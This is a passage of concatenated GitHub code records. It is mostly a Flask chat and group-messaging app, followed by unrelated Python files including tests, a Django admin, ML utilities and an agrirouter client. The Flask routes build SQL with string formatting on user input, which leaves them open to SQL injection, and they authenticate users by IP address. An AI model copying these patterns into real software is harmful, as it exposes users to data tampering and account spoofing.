flask.render_template('resultGet.html', postFrom = postFrom,MessageContents = Messages,username = username)\r\n \r\n else:\r\n postTo = flask.request.args.get(\"postFrom\")\r\n postFrom = postTo\r\n\r\n #フレンドかどうかの判定\r\n if(functions.check_friend(username,postTo) == False):\r\n return flask.redirect('/message/home')\r\n\r\n #get messages from user\r\n stmt = 'SELECT * FROM messages WHERE (postFrom = %s AND postTo = %s) OR (postFrom = %s AND postTo = %s)'\r\n param = (postFrom,username,username,postFrom)\r\n Messages = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n return flask.render_template('resultGet.html', postFrom = postFrom,MessageContents = Messages,username = username)\r\n\r\n\r\n###########show group index page##############\r\n@app.route(\"/group\",methods = [\"GET\",\"POST\"])\r\ndef group_home():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n \r\n #if method is get\r\n if flask.request.method == \"GET\":\r\n #get all groups\r\n stmt = 'SELECT * FROM users_groups WHERE userId = %s'\r\n param = (username,)\r\n Groups = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n return flask.render_template('group.html',username = username,props = \"グループ作成\", fromGroups = Groups)\r\n\r\n\r\n###########soute for creating group##############\r\n@app.route(\"/group/create\",methods = [\"POST\"])\r\ndef create_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #register group\r\n groupname = flask.request.form[\"groupname\"]\r\n stmt = 'Insert INTO group_rooms (name,owner) VALUE (\"{}\",\"{}\")'.format(groupname,username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n stmt = 'SELECT id FROM group_rooms WHERE name = %s AND owner = %s LIMIT 1'\r\n param = (groupname,username)\r\n group = DBconntctor.Select_from_DB(stmt,param)\r\n groupid = group[0][0]\r\n stmt = 'INSERT INTO users_groups (group_name,userID,groupID) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupname,username,groupid)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n return flask.redirect('/group')\r\n\r\n\r\n###########show group page##############\r\n@app.route(\"/group/show\",methods = [\"get\"])\r\ndef show_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #get all groups\r\n groupid = flask.request.args.get(\"groupid\")\r\n groupname = flask.request.args.get(\"groupname\")\r\n stmt = 'SELECT * FROM groups_massages WHERE groupId = %s'\r\n param = (groupid,)\r\n messages = DBconntctor.Select_from_DB(stmt,param)\r\n stmt = 'SELECT * FROM users_groups WHERE groupID = %s'\r\n param = (groupid,)\r\n users = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n #ユーザが実際にグループに属しているかの判定\r\n print(users)\r\n for user in users:\r\n if user[2] == username:\r\n return flask.render_template('group_show.html',props = \"グループ\", groupname = groupname,users = users,groupid = groupid,MessageContents = messages, username = username)\r\n \r\n return flask.redirect('/group')\r\n \r\n\r\n\r\n###########route for sending message to group##############\r\n@app.route(\"/group/send\",methods = [\"POST\"])\r\ndef send_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #send message to group\r\n groupid = flask.request.form[\"groupid\"]\r\n groupname = flask.request.form[\"groupname\"]\r\n content = flask.request.form[\"content\"]\r\n sendername = username\r\n stmt = 'INSERT INTO groups_massages (groupID,content,sendername) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupid,content,sendername)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n return flask.redirect('/group/show?groupid={}&groupname={}'.format(groupid,groupname))\r\n\r\n\r\n###########route for adding user to group##############\r\n@app.route(\"/group/adduser\",methods = [\"POST\"])\r\ndef add_user_to_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #add user to group\r\n groupid = flask.request.form[\"groupid\"]\r\n groupname = flask.request.form[\"groupname\"]\r\n userid = flask.request.form[\"added_username\"]\r\n stmt = 'INSERT INTO users_groups (group_name,userID,groupID) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupname,userid,groupid)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n return flask.redirect('/group/show?groupid={}&groupname={}'.format(groupid,groupname))\r\n\r\n\r\n###########show edit user info page##############\r\n@app.route(\"/userinfo/edit\",methods = [\"GET\",\"POST\"])\r\ndef edit_user_info():\r\n \r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #if method is get\r\n if flask.request.method == \"GET\":\r\n stmt = 'SELECT COUNT(id) FROM user_info WHERE userId = %s'\r\n param = (username,)\r\n count = DBconntctor.Select_from_DB(stmt,param)\r\n if count[0][0] > 0:\r\n #get user info\r\n stmt = 'SELECT * FROM user_info WHERE userId = %s'\r\n param = (username,)\r\n userinfo = DBconntctor.Select_from_DB(stmt,param)\r\n #print(userinfo)\r\n return flask.render_template('edit_user_info.html',username = username,props = \"ユ��ザー情報編集\",userinfo = userinfo)\r\n else:\r\n print(\"no user info\")\r\n return flask.render_template('edit_user_info_initial.html',username = username,props = \"ユーザー情報編集\")\r\n \r\n #if method is post\r\n if flask.request.method == \"POST\":\r\n comment = flask.request.form[\"comment\"]\r\n birthday = flask.request.form[\"birthday\"]\r\n twitter = flask.request.form[\"twitter\"]\r\n website = flask.request.form[\"website\"]\r\n imgFile = None\r\n print(birthday)\r\n if \"file\" in flask.request.files:\r\n imgFile = flask.request.files[\"file\"]\r\n UPLOAD_FOLDER = 'Python/static/image/'\r\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n imgFile.save(os.path.join(app.config['UPLOAD_FOLDER'], username + \".jpg\"))\r\n stmt = 'SELECT COUNT(id) FROM user_info WHERE userId = %s'\r\n param = (username,)\r\n count = DBconntctor.Select_from_DB(stmt,param)\r\n if count[0][0] > 0:\r\n #update user info\r\n if birthday == '':\r\n stmt = 'UPDATE user_info SET comment = \"{}\",twitter = \"{}\",website = \"{}\" WHERE userId = \"{}\"'.format(comment,twitter,website,username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n else:\r\n stmt = 'UPDATE user_info SET comment = \"{}\",birthday = \"{}\",twitter = \"{}\",website = \"{}\" WHERE userId = \"{}\"'.format(comment,birthday,twitter,website,username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n else:\r\n #insert user info\r\n if birthday == '':\r\n stmt = 'INSERT INTO user_info (userId,comment,twitter,website) VALUE (\"{}\",\"{}\",\"{}\",\"{}\")'.format(username,comment,twitter,website)\r\n DBconntctor.Insert_to_DB(stmt)\r\n else:\r\n stmt = 'INSERT INTO user_info (userId,comment,birthday,twitter,website) VALUE (\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'.format(username,comment,birthday,twitter,website)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/userinfo/edit')\r\n\r\n\r\n###########show user info page##############\r\n@app.route(\"/userinfo/show\",methods = [\"GET\"])\r\ndef show_user_info():\r\n \r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n \r\n #表示したいユーザーのユーザーIDを取得\r\n infoname = flask.request.args.get(\"infoname\")\r\n stmt = 'SELECT COUNT(id) FROM user_info WHERE userId = %s'\r\n param = (infoname,)\r\n count = DBconntctor.Select_from_DB(stmt,param)\r\n friend = functions.check_friend(infoname,username)\r\n if count[0][0] > 0:\r\n #get user info\r\n stmt = 'SELECT * FROM user_info WHERE userId = %s'\r\n param = (infoname,)\r\n userinfo = DBconntctor.Select_from_DB(stmt,param)\r\n print(userinfo)\r\n return flask.render_template('show_user_info.html',username = username,props = \"ユーザープロフィール\",userinfo = userinfo,friend = friend)\r\n else:\r\n return flask.render_template('/no_user_info.html')\r\n\r\n\r\n##########route for friend request##########\r\n@app.route(\"/friend/request\",methods = [\"GET\"])\r\ndef friend_request():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n requestname = username\r\n requestedname = flask.request.args.get(\"requestedname\")\r\n\r\n #check if already requested\r\n stmt = 'SELECT COUNT(id) FROM user_friends WHERE requestedId = %s AND requestId = %s'\r\n params = (requestedname,requestname,)\r\n count = DBconntctor.Select_from_DB(stmt,params)\r\n if count[0][0] > 0:\r\n stmt = 'UPDATE user_friends SET requested = \"{}\" WHERE requestedId = \"{}\" AND requestId = \"{}\"'.format(1,requestedname,requestname)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/message/home')\r\n #insert friend request\r\n stmt = 'INSERT INTO user_friends (requestedId,requestId,requested) VALUE (\"{}\",\"{}\",\"{}\")'.format(requestedname,requestname,1)\r\n DBconntctor.Insert_to_DB(stmt)\r\n print(stmt)\r\n return flask.redirect('/message/home')\r\n\r\n\r\n##########route for approve friend request##########\r\n@app.route(\"/friend/approve\",methods = [\"GET\"])\r\ndef friend_approve():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n requestedname = username\r\n requestname = flask.request.args.get(\"requestid\")\r\n\r\n #insert friend request\r\n stmt = 'UPDATE user_friends SET approved = \"{}\" WHERE requestedId = \"{}\" AND requestId = \"{}\"'.format(1,requestedname,requestname)\r\n DBconntctor.Insert_to_DB(stmt)\r\n stmt = 'INSERT INTO user_friends (requestedId,requestId,approved) VALUE (\"{}\",\"{}\",\"{}\")'.format(requestname,requestedname,1)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/message/home')\r\n\r\n##########route for reject friend request##########\r\n@app.route(\"/friend/reject\",methods = [\"GET\"])\r\ndef friend_reject():\r\n \r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n \r\n requestedname = username\r\n requestname = flask.request.args.get(\"requestid\")\r\n \r\n #insert friend request\r\n stmt = 'UPDATE user_friends SET requested = \"{}\" WHERE requestedId = \"{}\" AND requestId = \"{}\"'.format(0,requestedname,requestname)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/message/home')\r\n\r\n\r\nif __name__ == '__main__':\r\n socketio.run(app,debug=False,host='192.168.0.50',port=443,ssl_context=context) \r\n # serve(app,socketio,debug = True,host='192.168.0.50',post=443,ssl_context = context)","repo_name":"TAMIYANOMAR/Python_Flask_Message_Centeer","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":21449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36377183202","text":"import unittest\r\nimport os.path as osp\r\n\r\nfrom pylinac.core.utilities import *\r\n\r\n\r\nclass TestUtilities(unittest.TestCase):\r\n\r\n def test_isnumeric(self):\r\n # test numerics\r\n numerics = (5, 3.2, np.array((5,6))[0])\r\n for number in numerics:\r\n self.assertTrue(isnumeric(number))\r\n\r\n # test non-numerics\r\n notnumerics = ('5', np.array((5,6)))\r\n for notnumeric in notnumerics:\r\n self.assertFalse(isnumeric(notnumeric))\r\n\r\n def test_is_iterable(self):\r\n # test iterables\r\n iters = ((1,2,'t'), [4, 8, 'r'], np.array((5,6,7)))\r\n for iter in iters:\r\n self.assertTrue(is_iterable(iter))\r\n # test non-iterables\r\n noniters = (5,)\r\n for iter in noniters:\r\n self.assertFalse(is_iterable(iter))\r\n\r\n def test_is_dicom(self):\r\n \"\"\"Test the is_dicom function.\"\"\"\r\n \r\n test_file = osp.join(osp.dirname(osp.dirname(__file__)), 'test_files', 'VMAT', 'DRGSdmlc-105-example.dcm')\r\n invalid_file = test_file.replace('DR', 'DR_')\r\n notdicom_file = osp.abspath(__file__)\r\n\r\n # valid file returns True\r\n self.assertTrue(is_dicom(test_file))\r\n\r\n # return false for real file but not dicom\r\n self.assertFalse(is_dicom(notdicom_file))\r\n\r\n # test invalid path\r\n self.assertRaises(IOError, is_dicom, invalid_file)\r\n\r\n def test_typed_property(self):\r\n\r\n class DumbClass:\r\n intprop = typed_property('dumbprop', int)\r\n floatstrprop = typed_property('floatstrprop', (float, str))\r\n\r\n dc = DumbClass()\r\n\r\n # test the intprop\r\n self.assertIsNone(dc.intprop)\r\n dc.intprop = 3\r\n self.assertEqual(dc.intprop, 3)\r\n self.assertRaises(TypeError, setattr, dc, 'intprop', 1.0)\r\n\r\n # test the intstrprop\r\n dc.floatstrprop = 3.3\r\n self.assertEqual(dc.floatstrprop, 3.3)\r\n dc.floatstrprop = 'mystring'\r\n self.assertEqual(dc.floatstrprop, dc._floatstrprop)\r\n self.assertRaises(TypeError, setattr, dc, 'floatstrprop', 3)\r\n\r\n","repo_name":"vandonova/amazon_art","sub_path":"lib/python3.5/site-packages/tests/core/test_utilities.py","file_name":"test_utilities.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"41837498465","text":"from django.contrib import admin\nfrom .models import Booking\nfrom django_summernote.admin import SummernoteModelAdmin\n\n\n@admin.register(Booking)\nclass BookingAdmin(SummernoteModelAdmin):\n \"\"\"\n Adds 'Bookings' to the admin panel where an admin can view all bookings\n Features added to view certain information in a list,\n Search for specific elements\n A filter to quickly check bookings within that filter\n And fields for textareas so they are more customizable and clearly\n visible when viewing a booking\n \"\"\"\n list_display = (\n 'first_name',\n 'last_name',\n 'email',\n 'date',\n 'time',\n 'project_type'\n )\n search_fields = (\n 'first_name',\n 'last_name',\n 'email',\n 'project_type'\n )\n list_filter = (\n 'first_name',\n 'last_name',\n 'email',\n 'date',\n 'time',\n 'project_type'\n )\n summernote_fields = (\n 'project_type',\n 'project_details'\n )\n","repo_name":"BjornRodin/book-a-contractor","sub_path":"booking/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24137037603","text":"from random import randint\n\n\nguess = int(input(\"Guess a number between 1 and 10: \"))\nnumber = randint(1,10)\n\nwhile guess != number:\n if guess < number:\n guess = int(input(\"Too low, try again: \"))\n elif guess > number:\n guess = int(input(\"Too high, try again: \"))\n if guess == number:\n print(\"Winner!\")\n play_again = input(\"Do you want to keep playing? (y/n) \")\n play_again = play_again.lower()\n if play_again == \"y\":\n guess = int(input(\"Guess a number between 1 and 10: \"))\n number = randint(1,10)\n elif play_again == \"n\":\n print(\"OK, cya next time!\")\n elif play_again == \"stop\":\n print(\"OK, I'll stop.\")\n break\n else:\n print(\"Sry, I don't understand that.\")\n\n","repo_name":"thispassing/learningPython","sub_path":"guessing.py","file_name":"guessing.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74741018064","text":"from bs4 import BeautifulSoup\nimport numpy as np\nfrom os import path\n\nfrom .config import VOC_CLASSES\n\n\ndef parse_annotations(xml_path, keep_difficult=False, return_difficulty=False):\n with open(xml_path, 'r') as f:\n annotation = BeautifulSoup(f, 'xml')\n\n bboxes = []\n\n for obj in annotation.find_all('object'):\n difficulty = int(obj.difficult.text)\n\n if difficulty and not keep_difficult:\n continue\n\n label = obj.find('name').text\n xmin = float(obj.bndbox.xmin.text) - 1\n ymin = float(obj.bndbox.ymin.text) - 1\n xmax = float(obj.bndbox.xmax.text) - 1\n ymax = float(obj.bndbox.ymax.text) - 1\n box = [xmin, ymin, xmax, ymax, VOC_CLASSES.index(label)]\n\n if return_difficulty:\n box.append(difficulty)\n bboxes.append(box)\n\n return np.array(bboxes, np.int32)\n\n\ndef load_voc_dataset(dataroot='./data/VOCdevkit',\n splits=[('VOC2007', 'trainval'), ('VOC2012', 'trainval')],\n keep_difficult=False,\n return_difficulty=False):\n img_paths, bboxes = [], []\n for year, split in splits:\n ids_file = path.join(\n dataroot, year, 'ImageSets', 'Main', split + '.txt')\n with open(ids_file, 'r') as f:\n ids = [line.strip() for line in f.readlines()]\n\n img_paths += [path.join(dataroot, year, 'JPEGImages', id+'.jpg')\n for id in ids]\n bboxes += [parse_annotations(path.join(dataroot, year,\n 'Annotations', id+'.xml'),\n keep_difficult=keep_difficult,\n return_difficulty=return_difficulty)\n for id in ids]\n return np.array(img_paths), np.array(bboxes)\n","repo_name":"Leonardo-Blanger/RefineDet_TensorFlow","sub_path":"voc/voc_data_loader.py","file_name":"voc_data_loader.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"17189558395","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis file contais the functions that are useful in order to run the Main\n\n\"\"\"\n#------------------------------------------------------------------------------\n# Importing the libraries\n#------------------------------------------------------------------------------\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nimport rasterio\nimport os\nimport copy\n\n#------------------------------------------------------------------------------\n# Export the result in a .TIF\n#------------------------------------------------------------------------------\n\n\ndef ExportResult(Burned,sizeR,sizeC):\n path = os.getcwd()\n \n Seed_file = \"\\\\images\\seed_binary.tif\"\n SeedTif=rasterio.open(path+Seed_file)\n \n \n Seed_array = SeedTif.read()\n Result=copy.deepcopy(Seed_array[:,0:sizeR,0:sizeC])\n Result[0]=Burned\n \n Result_File=\"\\images\\Result.tif\"\n Result_File_Out=path+Result_File\n \n with rasterio.open(Result_File_Out,\n 'w', \n driver = SeedTif.meta['driver'],\n height = sizeR,\n width= sizeC,\n count=SeedTif.meta['count'],\n crs=SeedTif.meta['crs'],\n transform=SeedTif.meta['transform'],\n dtype= SeedTif.meta['dtype'],\n nodata= SeedTif.meta['nodata']) as destination:\n destination.write(Result)\n \n SeedTif.close()\n \n return\n\n\n#------------------------------------------------------------------------------\n# Importing the input as a binary matrix starting from a .TIF\n#------------------------------------------------------------------------------\n\ndef TakeImage(sizeR,sizeC):\n \n from PIL import Image\n im_Seed = Image.open('images/seed_binary.tif')\n imarray_Seed = np.array(im_Seed)\n \n im_Grow = Image.open('images/grow_binary.tif')\n imarray_Grow = np.array(im_Grow)\n \n im_Result = Image.open('images/result_binary.tif')\n \n imarray_Result = np.array(im_Result)\n \n Seed=imarray_Seed[0:sizeR,0:sizeC]\n Grow=imarray_Grow[0:sizeR,0:sizeC]\n Result=imarray_Result[0:sizeR,0:sizeC]\n \n return Seed, Grow, Result\n \n\n#------------------------------------------------------------------------------\n# Plot a color grid reading the value in the matrix: \n# 0 (unburned, green)\n# 1 (burned, red)\n#------------------------------------------------------------------------------\n\ndef ColorGrid(data,sizeR,sizeC):\n\n # create discrete colormap\n cmap = colors.ListedColormap(['green', 'red','blue'])\n bounds = [0,0.5,1.5,2]\n norm = colors.BoundaryNorm(bounds, cmap.N)\n\n fig, ax = plt.subplots()\n ax.imshow(data, cmap=cmap, norm=norm)\n\n # draw gridlines\n # ax.grid(which='major', axis='both', linestyle='-', color='k', linewidth=2)\n # ax.set_xticks(np.arange(0.5, size, 1));\n # ax.set_yticks(np.arange(0.5, size, 1));\n\n plt.show()\n \n \n#------------------------------------------------------------------------------\n# Look for the 8 neighbors of a pixel, in our case the pixel in question\n# is a seed and we go to select its neighbors\n#------------------------------------------------------------------------------\n\n#copy() necessario altrimenti python crea non una copia ma un collegamento\n#e se modifivco uno allora modifico pure l'altro se si tratta di array\n\ndef CercaVicini(Raster,sizeR,sizeC):\n \n MatriceVicini=Raster[:,:].copy()\n \n #set the seed's neighbours to 1 \n #row\n for j in range(sizeR): \n #column\n for k in range(sizeC):\n \n #element inside the matrix\n if Raster[j,k]==1 and j>0 and j0 and k0 and k0 and k0 and j0 and j str:\n \"\"\"Converts an integer into an English string.\"\"\"\n string = ''\n temp_num = n\n\n if temp_num // 1000:\n string += ones_list[temp_num // 1000] + ' thousand '\n temp_num = temp_num % 1000\n\n if temp_num // 100:\n string += ones_list[temp_num // 100] + ' hundred '\n temp_num = temp_num % 100\n\n if n > 100 and n % 100:\n string += 'and '\n\n if temp_num // 10 > 1:\n string += tens_list[temp_num // 10] + ' '\n temp_num = temp_num % 10\n string += ones_list[temp_num]\n\n elif temp_num // 10 == 1:\n string += teens_list[temp_num-10]\n\n else:\n temp_num = temp_num % 10\n string += ones_list[temp_num]\n\n return string\n\n\ndef sum_of_chars_upto(n: int) -> int:\n \"\"\" Sums up the number of characters in all the numbers upto n.\"\"\"\n total = 0\n for i in range(1, n+1):\n total += len(wordify(i).replace(' ', ''))\n return total\n\n\nif __name__ == '__main__':\n t0 = time.time()\n print(sum_of_chars_upto(1000))\n print('Solved in {} seconds using {}'.format(time.time()-t0, sum_of_chars_upto.__name__))\n","repo_name":"ranajaydas/projecteuler","sub_path":"euler017.py","file_name":"euler017.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39094887593","text":"\"\"\"\nThis script contains an example how to perform re-ranking with a Cross-Encoder for semantic search.\n\nFirst, we use an efficient Bi-Encoder to retrieve similar questions from the Quora Duplicate Questions dataset:\nhttps://www.quora.com/q/quoradata/First-Quora-Dataset-Release-Question-Pairs\n\nThen, we re-rank the hits from the Bi-Encoder using a Cross-Encoder.\n\"\"\"\nfrom sentence_transformers import SentenceTransformer, util\nfrom sentence_transformers import CrossEncoder\nimport os\nimport csv\nimport pickle\nimport time\nimport sys\n\n# We use a BiEncoder (SentenceTransformer) that produces embeddings for questions.\n# We then search for similar questions using cosine similarity and identify the top 100 most similar questions\nmodel_name = 'all-MiniLM-L6-v2'\nmodel = SentenceTransformer(model_name)\nnum_candidates = 500\n\n# To refine the results, we use a CrossEncoder. A CrossEncoder gets both inputs (input_question, retrieved_question)\n# and outputs a score 0...1 indicating the similarity.\ncross_encoder_model = CrossEncoder('cross-encoder/roberta-base-stsb')\n\n# Dataset we want to use\nurl = \"http://qim.fs.quoracdn.net/quora_duplicate_questions.tsv\"\ndataset_path = \"quora_duplicate_questions.tsv\"\nmax_corpus_size = 20000\n\n# Some local file to cache computed embeddings\nembedding_cache_path = 'quora-embeddings-{}-size-{}.pkl'.format(model_name.replace('/', '_'), max_corpus_size)\n\n#Check if embedding cache path exists\nif not os.path.exists(embedding_cache_path):\n # Check if the dataset exists. If not, download and extract\n # Download dataset if needed\n if not os.path.exists(dataset_path):\n print(\"Download dataset\")\n util.http_get(url, dataset_path)\n\n # Get all unique sentences from the file\n corpus_sentences = set()\n with open(dataset_path, encoding='utf8') as fIn:\n reader = csv.DictReader(fIn, delimiter='\\t', quoting=csv.QUOTE_MINIMAL)\n for row in reader:\n corpus_sentences.add(row['question1'])\n if len(corpus_sentences) >= max_corpus_size:\n break\n\n corpus_sentences.add(row['question2'])\n if len(corpus_sentences) >= max_corpus_size:\n break\n\n corpus_sentences = list(corpus_sentences)\n print(\"Encode the corpus. This might take a while\")\n corpus_embeddings = model.encode(corpus_sentences, show_progress_bar=True, convert_to_tensor=True, num_workers=2)\n\n print(\"Store file on disc\")\n with open(embedding_cache_path, \"wb\") as fOut:\n pickle.dump({'sentences': corpus_sentences, 'embeddings': corpus_embeddings}, fOut)\nelse:\n print(\"Load pre-computed embeddings from disc\")\n with open(embedding_cache_path, \"rb\") as fIn:\n cache_data = pickle.load(fIn)\n corpus_sentences = cache_data['sentences'][0:max_corpus_size]\n corpus_embeddings = cache_data['embeddings'][0:max_corpus_size]\n\n###############################\nprint(\"Corpus loaded with {} sentences / embeddings\".format(len(corpus_sentences)))\n\nwhile True:\n inp_question = input(\"Please enter a question: \")\n print(\"Input question:\", inp_question)\n\n #First, retrieve candidates using cosine similarity search\n start_time = time.time()\n question_embedding = model.encode(inp_question, convert_to_tensor=True)\n hits = util.semantic_search(question_embedding, corpus_embeddings, top_k=num_candidates)\n hits = hits[0] #Get the hits for the first query\n\n print(\"Cosine-Similarity search took {:.3f} seconds\".format(time.time()-start_time))\n print(\"Top 5 hits with cosine-similarity:\")\n for hit in hits[0:5]:\n print(\"\\t{:.3f}\\t{}\".format(hit['score'], corpus_sentences[hit['corpus_id']]))\n\n\n #Now, do the re-ranking with the cross-encoder\n start_time = time.time()\n sentence_pairs = [[inp_question, corpus_sentences[hit['corpus_id']]] for hit in hits]\n ce_scores = cross_encoder_model.predict(sentence_pairs)\n\n for idx in range(len(hits)):\n hits[idx]['cross-encoder_score'] = ce_scores[idx]\n\n #Sort list by CrossEncoder scores\n hits = sorted(hits, key=lambda x: x['cross-encoder_score'], reverse=True)\n print(\"\\nRe-ranking with Cross-Encoder took {:.3f} seconds\".format(time.time() - start_time))\n print(\"Top 5 hits with CrossEncoder:\")\n for hit in hits[0:5]:\n print(\"\\t{:.3f}\\t{}\".format(hit['cross-encoder_score'], corpus_sentences[hit['corpus_id']]))\n\n print(\"\\n\\n========\\n\")\n","repo_name":"UKPLab/sentence-transformers","sub_path":"examples/applications/cross-encoder/cross-encoder_reranking.py","file_name":"cross-encoder_reranking.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","stars":12439,"dataset":"github-code","pt":"48"} +{"seq_id":"30497101445","text":"from typing import Dict, Optional, Any\n\nfrom ..data_collator import DataCollator\nfrom ..dynamic_padding import DynamicPaddingDataCollator\n\n\ndef generalize_labels_key(batch, label_keys=(\"label\", \"label_ids\")):\n for key in label_keys:\n if key in batch:\n batch[\"labels\"] = batch.pop(key, None)\n\n return batch\n\nclass DefaultDataCollator(DataCollator):\n def collate(self, batch):\n return generalize_labels_key(batch)\n \nclass HuggingFaceDataCollatorWrapper:\n def __init__(\n self, \n tokenizer, \n additional_mapping: Optional[Dict[str, Any]] = None, \n pad_to_multiple_of=None,\n ignore_missing_keys=False,\n **args,\n ):\n self.tokenizer = tokenizer\n self.additional_mapping = additional_mapping\n\n if self.additional_mapping is None:\n self.additional_mapping = {}\n\n self.mapping = {\n \"input_ids\": self.tokenizer.pad_token_id,\n \"attention_mask\": 0,\n \"token_type_ids\": self.tokenizer.pad_token_type_id,\n \"offset_mapping\": (0, 0),\n }.update(self.additional_mapping)\n\n self.padding_side = self.tokenizer.padding_side\n self.max_length = \"input_ids\"\n self.pad_to_multiple_of = pad_to_multiple_of\n self.ignore_missing_keys = ignore_missing_keys\n\n self.dynamic_padding = DynamicPaddingDataCollator(\n mapping=self.mapping,\n max_length=self.max_length,\n padding_side=self.padding_side,\n pad_to_multiple_of=self.pad_to_multiple_of,\n ignore_missing_keys=self.ignore_missing_keys,\n )\n\n def default_collate(self, batch):\n batch = self.dynamic_padding(batch)\n batch = generalize_labels_key(batch)\n\n return batch","repo_name":"vad13irt/data-collators","sub_path":"src/data_collators/wrappers/huggingface.py","file_name":"huggingface.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"34889040168","text":"import json\nfrom abc import ABC, abstractmethod\n\nfrom agrirouter.messaging.clients.http import HttpClient\nfrom agrirouter.messaging.clients.mqtt import MqttClient\nfrom agrirouter.messaging.messages import Message\nfrom agrirouter.messaging.request import MessageRequest\nfrom agrirouter.messaging.result import MessagingResult\nfrom agrirouter.onboarding.exceptions import BadMessagingResult\nfrom agrirouter.onboarding.response import SoftwareOnboardingResponse\n\n\nclass AbstractMessagingClient(ABC):\n\n @staticmethod\n def create_message_request(parameters) -> MessageRequest:\n messages = []\n for encoded_message in parameters.get_encoded_messages():\n message = Message(encoded_message)\n messages.append(message.json_serialize())\n message_request = MessageRequest(\n parameters.get_onboarding_response().get_sensor_alternate_id(),\n parameters.get_onboarding_response().get_capability_alternate_id(),\n messages\n )\n return message_request\n\n @abstractmethod\n def send(self, parameters):\n ...\n\n\nclass HttpMessagingService(AbstractMessagingClient):\n\n def __init__(self):\n self.client = HttpClient()\n\n def send(self, parameters) -> MessagingResult:\n request = self.create_message_request(parameters)\n response = self.client.send_measure(parameters.get_onboarding_response(), request)\n if response.status != 200:\n raise BadMessagingResult(f\"Messaging Request failed with status code {response.status}\")\n result = MessagingResult([parameters.get_application_message_id()])\n return result\n\n\nclass MqttMessagingService(AbstractMessagingClient):\n\n def __init__(self,\n onboarding_response: SoftwareOnboardingResponse,\n on_message_callback: callable = None,\n client_async: bool = True\n ):\n\n self.onboarding_response = onboarding_response\n self.client = MqttClient(\n onboard_response=onboarding_response,\n client_id=onboarding_response.get_connection_criteria().get_client_id(),\n on_message_callback=on_message_callback,\n )\n if client_async:\n self.client.connect_async(\n self.onboarding_response.get_connection_criteria().get_host(),\n self.onboarding_response.get_connection_criteria().get_port()\n )\n else:\n self.client.connect(\n self.onboarding_response.get_connection_criteria().get_host(),\n self.onboarding_response.get_connection_criteria().get_port()\n )\n\n def send(self, parameters, qos: int = 0) -> MessagingResult:\n message_request = self.create_message_request(parameters)\n mqtt_payload = message_request.json_serialize()\n self.client.publish(\n topic=self.onboarding_response.get_connection_criteria().get_measures(),\n payload=json.dumps(mqtt_payload),\n qos=qos\n )\n result = 